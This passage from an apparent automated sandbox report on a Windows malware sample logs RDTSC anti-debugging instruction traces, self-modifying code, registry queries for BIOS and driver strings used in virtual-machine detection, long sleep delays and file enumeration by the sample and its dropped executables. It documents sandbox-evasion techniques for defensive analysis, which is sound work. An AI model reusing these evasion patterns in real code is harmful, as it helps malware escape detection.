                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3017A second address: 4B301F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 39EAF3EEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102D2h 0x00000011 mov dword ptr [esp], ebx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F4784F102CEh 0x0000001b adc si, E368h 0x00000020 jmp 00007F4784F102CBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F4784F102D8h 0x0000002c adc eax, 52F635C8h 0x00000032 jmp 00007F4784F102CBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+10h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov eax, edx 0x00000041 mov ax, di 0x00000044 popad 0x00000045 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B301F4 second address: 4B30205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 38h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop esi 0x0000000e mov bl, FBh 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30205 second address: 4B3020A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3020A second address: 4B30229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 4118496Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4785B0BF4Eh 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30229 second address: 4B30238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30238 second address: 4B3026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4785B0BF4Fh 0x00000009 add si, CF7Eh 0x0000000e jmp 00007F4785B0BF59h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3026C second address: 4B3027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, 818Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3027D second address: 4B30282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30282 second address: 4B302AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F4784F102CDh 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B302AB second address: 4B30317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F4785B0BF50h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, E6E4h 0x00000015 pushfd 0x00000016 jmp 00007F4785B0BF4Dh 0x0000001b add ecx, 58E37726h 0x00000021 jmp 00007F4785B0BF51h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a call 00007F4785B0BF4Ch 0x0000002f movzx esi, bx 0x00000032 pop edi 0x00000033 call 00007F4785B0BF4Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30317 second address: 4B30342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 test esi, esi 0x00000008 jmp 00007F4784F102D7h 0x0000000d je 00007F47F813E5A5h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30342 second address: 4B30346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30346 second address: 4B3034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3034A second address: 4B30350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30350 second address: 4B30373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4784F102CAh 0x00000019 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30373 second address: 4B30379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30379 second address: 4B3037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3037F second address: 4B30383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30383 second address: 4B303C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F47F813E566h 0x0000000e jmp 00007F4784F102D4h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bl, 6Dh 0x0000001b jmp 00007F4784F102D6h 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B303C4 second address: 4B303DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, eax 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B303DB second address: 4B30422 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4784F102CEh 0x00000008 add ah, FFFFFFD8h 0x0000000b jmp 00007F4784F102CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dx, cx 0x00000016 popad 0x00000017 test edx, 61000000h 0x0000001d pushad 0x0000001e movzx ecx, bx 0x00000021 movsx edx, ax 0x00000024 popad 0x00000025 jne 00007F47F813E53Fh 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4784F102CBh 0x00000032 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30422 second address: 4B30493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4785B0BF4Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4785B0BF59h 0x0000000f xor ecx, 6E248B86h 0x00000015 jmp 00007F4785B0BF51h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e test byte ptr [esi+48h], 00000001h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edi 0x00000025 pop eax 0x00000026 pop edx 0x00000027 mov edx, eax 0x00000029 popad 0x0000002a jne 00007F47F8D3A171h 0x00000030 jmp 00007F4785B0BF4Eh 0x00000035 test bl, 00000007h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30493 second address: 4B30499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30499 second address: 4B3049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3049F second address: 4B304A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50A8E second address: 4B50AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 mov cx, di 0x00000009 pop edx 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4785B0BF59h 0x00000015 or ecx, 3000E8F6h 0x0000001b jmp 00007F4785B0BF51h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F4785B0BF50h 0x00000027 adc si, FA18h 0x0000002c jmp 00007F4785B0BF4Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50AF2 second address: 4B50B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102CCh 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50B1E second address: 4B50BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4785B0BF56h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F4785B0BF4Eh 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 pop eax 0x0000001a pushfd 0x0000001b jmp 00007F4785B0BF57h 0x00000020 xor eax, 10B1CEFEh 0x00000026 jmp 00007F4785B0BF59h 0x0000002b popfd 0x0000002c popad 0x0000002d and esp, FFFFFFF8h 0x00000030 jmp 00007F4785B0BF4Eh 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F4785B0BF57h 0x0000003d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50BBC second address: 4B50C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4784F102CFh 0x00000009 adc eax, 6095FE6Eh 0x0000000f jmp 00007F4784F102D9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F4784F102D0h 0x0000001b xor ax, D9E8h 0x00000020 jmp 00007F4784F102CBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4784F102D4h 0x00000031 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C2B second address: 4B50C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C31 second address: 4B50C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C35 second address: 4B50C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F4785B0BF55h 0x00000012 add cl, 00000066h 0x00000015 jmp 00007F4785B0BF51h 0x0000001a popfd 0x0000001b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C6C second address: 4B50C8D instructions: 0x00000000 rdtsc 0x00000002 mov cx, 6597h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov di, ax 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4784F102D0h 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C8D second address: 4B50C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C91 second address: 4B50C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C97 second address: 4B50CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4785B0BF4Ch 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F4785B0BF4Bh 0x0000000f sub al, FFFFFFFEh 0x00000012 jmp 00007F4785B0BF59h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4785B0BF4Ch 0x00000023 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50CE2 second address: 4B50D25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F4784F102D4h 0x00000010 push ecx 0x00000011 pop esi 0x00000012 popad 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 jmp 00007F4784F102D3h 0x0000001b sub ebx, ebx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50D25 second address: 4B50E14 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 93CDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dx, si 0x0000000b popad 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 pushfd 0x00000013 jmp 00007F4785B0BF4Eh 0x00000018 sub eax, 2C852018h 0x0000001e jmp 00007F4785B0BF4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F47F8D1157Bh 0x0000002b jmp 00007F4785B0BF56h 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007F4785B0BF50h 0x0000003c mov ecx, esi 0x0000003e jmp 00007F4785B0BF50h 0x00000043 je 00007F47F8D1154Bh 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F4785B0BF4Eh 0x00000050 sub si, F408h 0x00000055 jmp 00007F4785B0BF4Bh 0x0000005a popfd 0x0000005b popad 0x0000005c test byte ptr [77DE6968h], 00000002h 0x00000063 pushad 0x00000064 pushad 0x00000065 mov ax, di 0x00000068 mov ax, bx 0x0000006b popad 0x0000006c pushfd 0x0000006d jmp 00007F4785B0BF59h 0x00000072 and ah, FFFFFFD6h 0x00000075 jmp 00007F4785B0BF51h 0x0000007a popfd 0x0000007b popad 0x0000007c jne 00007F47F8D114F6h 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 mov dx, 7A5Eh 0x00000089 popad 0x0000008a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50E14 second address: 4B50E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50E1A second address: 4B50E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50E1E second address: 4B50E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F4784F102D9h 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F4784F102CEh 0x00000016 push eax 0x00000017 jmp 00007F4784F102CBh 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4784F102D5h 0x00000024 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 39DCD1 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 39CB43 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 3C3B9A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 4245C0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 111DCD1 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 111CB43 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 1143B9A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 11A45C0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXECode function: 10_2_04BB0AA0 rdtsc 10_2_04BB0AA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 180000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5762
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3658
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3999
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5881
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 526
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1985
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 2971
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 2256
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1281
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeAPI coverage: 3.9 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -18446744073709540s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6496Thread sleep count: 57 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6496Thread sleep time: -114057s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6816Thread sleep count: 55 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6816Thread sleep time: -110055s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6796Thread sleep count: 526 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6796Thread sleep time: -15780000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6744Thread sleep time: -360000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720Thread sleep count: 54 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720Thread sleep time: -108054s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep count: 1985 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep time: -3971985s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6600Thread sleep count: 59 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6600Thread sleep time: -118059s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep count: 2971 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep time: -5944971s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep count: 2256 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep time: -4514256s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep count: 1281 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep time: -2563281s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ADC2A2 FindFirstFileExW,0_2_00ADC2A2
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
